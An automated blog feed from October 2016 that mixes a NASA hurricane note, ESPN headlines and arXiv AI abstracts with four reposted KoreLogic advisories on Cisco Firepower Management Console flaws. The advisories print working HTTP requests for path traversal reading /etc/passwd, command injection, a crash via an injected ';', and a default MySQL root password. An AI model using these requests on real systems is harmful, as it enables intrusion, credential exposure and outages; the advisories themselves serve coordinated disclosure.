On October 2, 2016 at approximately 4:50 a.m. EST (0950 UTC), NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew. At that time, Matthew had maximum sustained winds of 150 mph making it a strong category 4 hurricane. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2dN4smg
via IFTTT

Wednesday, October 5, 2016

MLB Image: Toronto police tweet picture of fan suspected of throwing beer can at Orioles' Hyun Soo Kim on Tuesday (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Ex-Baltimore P Andrew Miller defends Buck Showalter, says he's one of the best at "running a game" - Crasnick (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Seer: Empowering Software Defined Networking with Data Analytics. (arXiv:1610.01221v1 [cs.NI])

Network complexity is increasing, making network control and orchestration a challenging task. The proliferation of network information and tools for data analytics can provide an important insight into resource provisioning and optimisation. The network knowledge incorporated in software defined networking can facilitate the knowledge driven control, leveraging the network programmability. We present Seer: a flexible, highly configurable data analytics platform for network intelligence based on software defined networking and big data principles. Seer combines a computational engine with a distributed messaging system to provide a scalable, fault tolerant and real-time platform for knowledge extraction. Our first prototype uses Apache Spark for streaming analytics and open network operating system (ONOS) controller to program a network in real-time. The first application we developed aims to predict the mobility pattern of mobile devices inside a smart city environment.



from cs.AI updates on arXiv.org http://ift.tt/2dv71GF
via IFTTT

Find Your Own Way: Weakly-Supervised Segmentation of Path Proposals for Urban Autonomy. (arXiv:1610.01238v1 [cs.RO])

We present a weakly-supervised approach to segmenting proposed drivable paths in images with the goal of autonomous driving in complex urban environments. Using recorded routes from a data collection vehicle, our proposed method generates vast quantities of labelled images containing proposed paths and obstacles without requiring manual annotation, which we then use to train a deep semantic segmentation network. With the trained network we can segment proposed paths and obstacles at run-time using a vehicle equipped with only a monocular camera without relying on explicit modelling of road or lane markings. We evaluate our method on the large-scale KITTI and Oxford RobotCar datasets and demonstrate reliable path proposal and obstacle segmentation in a wide variety of environments under a range of lighting, weather and traffic conditions. We illustrate how the method can generalise to multiple path proposals at intersections and outline plans to incorporate the system into a framework for autonomous urban driving.



from cs.AI updates on arXiv.org http://ift.tt/2dLIhIK
via IFTTT

EPOpt: Learning Robust Neural Network Policies Using Model Ensembles. (arXiv:1610.01283v1 [cs.LG])

Sample complexity and safety are major challenges when learning policies with reinforcement learning for real-world tasks -- especially when the policies are represented using rich function approximators like deep neural networks. Model-based methods where the real-world target domain is approximated using a simulated source domain provide an avenue to tackle the above challenges by augmenting real data with simulated data. However, discrepancies between the simulated source domain and the target domain pose a challenge for simulated training. We introduce the EPOpt algorithm, which uses an ensemble of simulated source domains and a form of adversarial training to learn policies that are robust and generalize to a broad range of possible target domains, including to unmodeled effects. Further, the probability distribution over source domains in the ensemble can be adapted using data from target domain and approximate Bayesian methods, to progressively make it a better approximation. Thus, learning on a model ensemble, along with source domain adaptation, provides the benefit of both robustness and learning/adaptation.



from cs.AI updates on arXiv.org http://ift.tt/2dLIn30
via IFTTT

Soft-margin learning for multiple feature-kernel combinations with Domain Adaptation, for recognition in surveillance face datasets. (arXiv:1610.01374v1 [cs.CV])

Face recognition (FR) is the most preferred mode for biometric-based surveillance, due to its passive nature of detecting subjects, amongst all different types of biometric traits. FR under surveillance scenario does not give satisfactory performance due to low contrast, noise and poor illumination conditions on probes, as compared to the training samples. A state-of-the-art technology, Deep Learning, even fails to perform well in these scenarios. We propose a novel soft-margin based learning method for multiple feature-kernel combinations, followed by feature transformed using Domain Adaptation, which outperforms many recent state-of-the-art techniques, when tested using three real-world surveillance face datasets.



from cs.AI updates on arXiv.org http://ift.tt/2dT6v7Y
via IFTTT

The Predictive Context Tree: Predicting Contexts and Interactions. (arXiv:1610.01381v1 [cs.AI])

With a large proportion of people carrying location-aware smartphones, we have an unprecedented platform from which to understand individuals and predict their future actions. This work builds upon the Context Tree data structure that summarises the historical contexts of individuals from augmented geospatial trajectories, and constructs a predictive model for their likely future contexts. The Predictive Context Tree (PCT) is constructed as a hierarchical classifier, capable of predicting both the future locations that a user will visit and the contexts that a user will be immersed within. The PCT is evaluated over real-world geospatial trajectories, and compared against existing location extraction and prediction techniques, as well as a proposed hybrid approach that uses identified land usage elements in combination with machine learning to predict future interactions. Our results demonstrate that higher predictive accuracies can be achieved using this hybrid approach over traditional extracted location datasets, and the PCT itself matches the performance of the hybrid approach at predicting future interactions, while adding utility in the form of context predictions. Such a prediction system is capable of understanding not only where a user will visit, but also their context, in terms of what they are likely to be doing.



from cs.AI updates on arXiv.org http://ift.tt/2dv6iW3
via IFTTT

Towards semi-episodic learning for robot damage recovery. (arXiv:1610.01407v1 [cs.RO])

The recently introduced Intelligent Trial and Error algorithm (IT\&E) enables robots to creatively adapt to damage in a matter of minutes by combining an off-line evolutionary algorithm and an on-line learning algorithm based on Bayesian Optimization. We extend the IT\&E algorithm to allow for robots to learn to compensate for damages while executing their task(s). This leads to a semi-episodic learning scheme that increases the robot's lifetime autonomy and adaptivity. Preliminary experiments on a toy simulation and a 6-legged robot locomotion task show promising results.



from cs.AI updates on arXiv.org http://ift.tt/2dLJekg
via IFTTT

Visual Question Answering: Datasets, Algorithms, and Future Challenges. (arXiv:1610.01465v1 [cs.CV])

Visual Question Answering (VQA) is a recent problem in computer vision and natural language processing that has garnered a large amount of interest from the deep learning, computer vision, and natural language processing communities. In VQA, an algorithm needs to answer text-based questions about images. Since the release of the first VQA dataset in 2014, several additional datasets have been released and many algorithms have been proposed. In this review, we critically examine the current state of VQA in terms of problem formulation, existing datasets, evaluation metrics, and algorithms. In particular, we discuss the limitations of current datasets with regard to their ability to properly train and assess VQA algorithms. We then exhaustively review existing algorithms for VQA. Finally, we discuss possible future directions for VQA and image understanding research.



from cs.AI updates on arXiv.org http://ift.tt/2cUI3xg
via IFTTT

$\ell_1$ Regularized Gradient Temporal-Difference Learning. (arXiv:1610.01476v1 [cs.AI])

In this paper, we study the Temporal Difference (TD) learning with linear value function approximation. It is well known that most TD learning algorithms are unstable with linear function approximation and off-policy learning. Recent development of Gradient TD (GTD) algorithms has addressed this problem successfully. However, the success of GTD algorithms requires a set of well chosen features, which are not always available. When the number of features is huge, the GTD algorithms might face the problem of overfitting and being computationally expensive. To cope with this difficulty, regularization techniques, in particular $\ell_1$ regularization, have attracted significant attentions in developing TD learning algorithms. The present work combines the GTD algorithms with $\ell_1$ regularization. We propose a family of $\ell_1$ regularized GTD algorithms, which employ the well known soft thresholding operator. We investigate convergence properties of the proposed algorithms, and depict their performance with several numerical experiments.



from cs.AI updates on arXiv.org http://ift.tt/2dT6mBw
via IFTTT

Lifted Message Passing for the Generalized Belief Propagation. (arXiv:1610.01525v1 [cs.AI])

We introduce the lifted Generalized Belief Propagation (GBP) message passing algorithm, for the computation of sum-product queries in Probabilistic Relational Models (e.g. Markov logic network). The algorithm forms a compact region graph and establishes a modified version of message passing, which mimics the GBP behavior in a corresponding ground model. The compact graph is obtained by exploiting a graphical representation of clusters, which reduces cluster symmetry detection to isomorphism tests on small local graphs. The framework is thus capable of handling complex models, while remaining domain-size independent.



from cs.AI updates on arXiv.org http://ift.tt/2dv6ep1
via IFTTT

A Novel Representation of Neural Networks. (arXiv:1610.01549v1 [stat.ML])

Deep Neural Networks (DNNs) have become very popular for prediction in many areas. Their strength is in representation with a high number of parameters that are commonly learned via gradient descent or similar optimization methods. However, the representation is non-standardized, and the gradient calculation methods are often performed using component-based approaches that break parameters down into scalar units, instead of considering the parameters as whole entities. In this work, these problems are addressed. Standard notation is used to represent DNNs in a compact framework. Gradients of DNN loss functions are calculated directly over the inner product space on which the parameters are defined. This framework is general and is applied to two common network types: the Multilayer Perceptron and the Deep Autoencoder.



from cs.AI updates on arXiv.org http://ift.tt/2dT5WuO
via IFTTT

A new algorithm for identity verification based on the analysis of a handwritten dynamic signature. (arXiv:1610.01578v1 [cs.CV])

Identity verification based on authenticity assessment of a handwritten signature is an important issue in biometrics. There are many effective methods for signature verification taking into account dynamics of a signing process. Methods based on partitioning take a very important place among them. In this paper we propose a new approach to signature partitioning. Its most important feature is the possibility of selecting and processing of hybrid partitions in order to increase a precision of the test signature analysis. Partitions are formed by a combination of vertical and horizontal sections of the signature. Vertical sections correspond to the initial, middle, and final time moments of the signing process. In turn, horizontal sections correspond to the signature areas associated with high and low pen velocity and high and low pen pressure on the surface of a graphics tablet. Our previous research on vertical and horizontal sections of the dynamic signature (created independently) led us to develop the algorithm presented in this paper. Selection of sections, among others, allows us to define the stability of the signing process in the partitions, promoting signature areas of greater stability (and vice versa). In the test of the proposed method two databases were used: public MCYT-100 and paid BioSecure.



from cs.AI updates on arXiv.org http://ift.tt/2dv71q9
via IFTTT

Modeling State-Conditional Observation Distribution using Weighted Stereo Samples for Factorial Speech Processing Models. (arXiv:1503.02578v2 [cs.LG] UPDATED)

This paper investigates the effectiveness of factorial speech processing models in noise-robust automatic speech recognition tasks. For this purpose, the paper proposes an idealistic approach for modeling state-conditional observation distribution of factorial models based on weighted stereo samples. This approach is an extension to previous single pass retraining for ideal model compensation which is extended here to support multiple audio sources. Non-stationary noises can be considered as one of these audio sources with multiple states. Experiments of this paper over the set A of the Aurora 2 dataset show that recognition performance can be improved by this consideration. The improvement is significant in low signal to noise energy conditions, up to 4% absolute word recognition accuracy. In addition to the power of the proposed method in accurate representation of state-conditional observation distribution, it has an important advantage over previous methods by providing the opportunity to independently select feature spaces for both source and corrupted features. This opens a new window for seeking better feature spaces appropriate for noisy speech, independent from clean speech features.



from cs.AI updates on arXiv.org http://ift.tt/185Z3y6
via IFTTT

Characteristics of Visual Categorization of Long-Concatenated and Object-Directed Human Actions by a Multiple Spatio-Temporal Scales Recurrent Neural Network Model. (arXiv:1602.01921v2 [cs.CV] UPDATED)

The current paper proposes a novel dynamic neural network model for categorization of complex human action visual patterns. The Multiple Spatio-Temporal Scales Recurrent Neural Network (MSTRNN) adds recurrent connectivity to a prior model, the Multiple Spatio-Temporal Scales Neural Network (MSTNN). By developing adequate recurrent contextual dynamics, the MSTRNN can learn to extract latent spatio-temporal structures from input image sequences more effectively than the MSTNN. Two experiments with the MSTRNN are detailed. The first experiment involves categorizing a set of human movement patterns consisting of sequences of action primitives. The MSTRNN is able to extract long-ranged correlations in video images better than the MSTNN. Time series analysis on neural activation values obtained from the recurrent structure shows that the MSTRNN accumulates extracted spatio-temporal features which discriminate action sequences. The second experiment requires that the model categorize a set of object-directed actions, and demonstrates that the MSTRNN can learn to extract structural relationships between actions and action-directed-objects (ADOs). Analysis of characteristics employed in categorizing both object-directed actions and pantomime actions indicates that the model network develops categorical memories by organizing relational structures between each action and appropriate ADO. Such relational structure may be necessary for categorizing human actions with an adequate ability to generalize.



from cs.AI updates on arXiv.org http://ift.tt/1PJbylV
via IFTTT

Representing Verbs with Rich Contexts: an Evaluation on Verb Similarity. (arXiv:1607.02061v2 [cs.CL] UPDATED)

Several studies on sentence processing suggest that the mental lexicon keeps track of the mutual expectations between words. Current DSMs, however, represent context words as separate features, thereby loosing important information for word expectations, such as word interrelations. In this paper, we present a DSM that addresses this issue by defining verb contexts as joint syntactic dependencies. We test our representation in a verb similarity task on two datasets, showing that joint contexts achieve performances comparable to single dependencies or even better. Moreover, they are able to overcome the data sparsity problem of joint feature spaces, in spite of the limited size of our training corpus.



from cs.AI updates on arXiv.org http://ift.tt/29oV0yv
via IFTTT

A Geometric Framework for Convolutional Neural Networks. (arXiv:1608.04374v2 [stat.ML] UPDATED)

In this paper, a geometric framework for neural networks is proposed. This framework uses the inner product space structure underlying the parameter set to perform gradient descent not in a component-based form, but in a coordinate-free manner. Convolutional neural networks are described in this framework in a compact form, with the gradients of standard --- and higher-order --- loss functions calculated for each layer of the network. This approach can be applied to other network structures and provides a basis on which to create new networks.



from cs.AI updates on arXiv.org http://ift.tt/2aVrn7O
via IFTTT

MLB: Blue Jays apologize to Orioles for "embarrassing incident" when fan threw beer at Hyun Soo Kim in wild-card game (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access

KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access Title: Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access Advisory ID: KL-001-2016-007 Publication Date: 2016.10.05 Publication URL: http://ift.tt/2dfAwKj 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-94: Improper Control of Generation of Code Impact: Arbitrary Code Execution Attack vector: HTTP CVE-ID: CVE-2016-6433 2. Vulnerability Description An authenticated user can run arbitrary system commands as the www user which leads to root. 3. Technical Description A valid session and CSRF token is required. The webserver runs as a non-root user which is permitted to sudo commands as root with no password. POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1 Host: 1.3.3.7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6 Connection: close Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion

KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion Title: Cisco Firepower Threat Management Console Local File Inclusion Advisory ID: KL-001-2016-006 Publication Date: 2016.10.05 Publication URL: http://ift.tt/2dfA7b7 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path Impact: Information Disclosure Attack vector: HTTP CVE-ID: CVE-2016-6435 2. Vulnerability Description An authenticated user can access arbitrary files on the local system. 3. Technical Description Requests that take a file path do not properly filter what files can be requested. The webserver does not run as root, so files such as /etc/shadow are not readable. GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1 Host: 1.3.3.7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3 Connection: close HTTP/1.1 200 OK Date: Fri, 22 Apr 2016 23:58:41 GMT Server: Apache Content-Disposition: attachment; filename=passwd X-Frame-Options: SAMEORIGIN Connection: close Content-Type: application/octet-stream Content-Length: 623 root:x:0:0:Operator:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin nobody:x:99:99:nobody:/:/sbin/nologin sshd:x:33:33:sshd:/:/sbin/nologin www:x:67:67:HTTP server:/var/www:/sbin/nologin sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin admin:x:100:100::/Volume/home/admin:/bin/sh casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in version 6.1. Vendor acknowledgement available at: http://ift.tt/2dL352o 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure. 7. Proof of Concept See Technical Description The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials

KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials Advisory ID: KL-001-2016-005 Publication Date: 2016.10.05 Publication URL: http://ift.tt/2dfA8fb 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials Impact: Authentication Bypass CVE-ID: CVE-2016-6434 2. Vulnerability Description The root account for the local MySQL database has poor password complexity. 3. Technical Description root@firepower:/Volume/6.0.1# mysql -u root --password=admin Warning: Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 23348 Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial) Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases;

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service

KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service Title: Cisco Firepower Threat Management Console Authenticated Denial of Service Advisory ID: KL-001-2016-004 Publication Date: 2016.10.05 Publication URL: http://ift.tt/2dT7Vfg 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-404: Improper Resource Shutdown or Release Impact: Denial of Service Attack vector: HTTP 2. Vulnerability Description A authenticated user can send an HTTP request that will crash the Mojo Server thereby making future access impossible until a system reboot is performed. 3. Technical Description The parameter uuid is passed to a chmod function as part of a file path. A ';' in the path causes the function to return an exception. POST /pjb.cgi HTTP/1.1 Host: 1.3.3.7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Content-Type: application/x-www-form-urlencoded Referer: https://1.3.3.7/ddd/ Content-Length: 1180 Cookie: x-auto-507=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; x-auto-467=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; CGISESSID=ab588faec87c38a18347787e3b442ff8 Connection: close &function=SF::UI::PJB::Vpn::List::saveVpnDeployment&parameters=%5B%7B%22password%22%3A%22test%22%2C+%22authentication_method%22%3A%22password%22%2C+%22type%22%3A%22PTP%22%2C+%22advanced_setting%22%3A%7B%22ah%22%3A0%2C+%22life_bytes%22%3A%220%22%2C+%22life_time%22%3A1%2C+%22life_time_unit%22%3A%22hours%22%2C+%22life_packets%22%3A%220%22%2C+%22ike_life_time%22%3A3%2C+%22ike_life_time_unit%22%3A%22hours%22%2C+%22ikev2%22%3A1%2C+%22ike_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22modp2048%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22modp2048%22%7D%5D%7D%2C+%22phase2_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22%22%7D%5D%7D%7D%2C+%22status%22%3A0%2C+%22name%22%3A%22test%22%2C+%22uuid%22%3A%2207a0d152-09fc-11e6-93cc-9d074250060f;%22%2C+%22applied%22%3A-1%7D%2C%5B%5D%5D&sf_action_id=a5ba3e29eb18730f7c8dc88d53b48759&ex=1&ss=AllVpnList As no exception handler is defined, the process exits. Perl traceback: The 'file' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;.lock") to SF::System::chmod did not pass the 'Type Validator (system.file)' callback at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 73 SF::System::__ANON__('The \'file\' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc...') called at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 640 SF::System::chmod('HASH(0x114c3c88)') called at /usr/local/sf/lib/perl/5.10.1/SF/Util.pm line 619 SF::Util::wait_for_lock('/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;....', 120) called at /usr/local/sf/lib/perl/5.10.1/SF/EODataHandler/VPNDeployment.pm line 206 SF::EODataHandler::VPNDeployment::get_lock('07a0d152-09fc-11e6-93cc-9d074250060f;') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB/Vpn/List.pm line 540 SF::UI::PJB::Vpn::List::saveVpnDeployment('HASH(0x1154bf38)', 'ARRAY(0x11513750)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 859 SF::UI::PJB::executeFunction('SF::UI::PJB::Vpn::List::saveVpnDeployment', 'ARRAY(0x11513720)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 821 SF::UI::PJB::handleRequest('SF::UI::PJB::Vpn::List::saveVpnDeployment', '[{"password":"test", "authentication_method":"password", "typ...') called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 39 eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 42 SF::Mojo::Handlers::PjbHandler::handle_pjb_cgi('SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 126 Mojolicious::__ANON__(undef, 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23 Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_action', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 106 Mojolicious::Routes::_action('SF::Mojo=HASH(0x905ed38)', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 191 Mojolicious::Routes::_controller('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)', 'HASH(0x10026868)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 43 Mojolicious::Routes::continue('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 51 Mojolicious::Routes::dispatch('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 118 Mojolicious::dispatch('SF::Mojo=HASH(0x905ed38)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 127 Mojolicious::__ANON__(undef, 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::__ANON__() called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217 eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217 SF::Mojo::__ANON__('CODE(0x1152fe98)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199 Mojolicious::_exception('CODE(0xf58a1098)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23 Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_dispatch', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 133 Mojolicious::handler('SF::Mojo=HASH(0x905ed38)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server.pm line 71 Mojo::Server::__ANON__('Mojo::Server::Prefork=HASH(0x8349e58)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15 Mojo::EventEmitter::emit('Mojo::Server::Prefork=HASH(0x8349e58)', 'request', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 83 Mojo::Server::Daemon::__ANON__('Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15 Mojo::EventEmitter::emit('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'request') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Transaction/HTTP.pm line 65 Mojo::Transaction::HTTP::server_read('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 186 Mojo::Server::Daemon::_read('Mojo::Server::Prefork=HASH(0x8349e58)', 'b2bd7252c6d676b510adb8ba94b9f73f', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 166 Mojo::Server::Daemon::__ANON__('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33 Mojo::EventEmitter::emit_safe('Mojo::IOLoop::Stream=HASH(0x103a7e40)', 'read', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 116 Mojo::IOLoop::Stream::_read('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 53 Mojo::IOLoop::Stream::__ANON__('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115 Mojo::Reactor::Poll::_sandbox('Mojo::Reactor::EV=HASH(0x88c8ca8)', 'Read', 'CODE(0x1152e100)', 0) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 52 Mojo::Reactor::EV::_io('Mojo::Reactor::EV=HASH(0x88c8ca8)', 77, 'EV::IO=SCALAR(0x10667cc8)', 3) called at 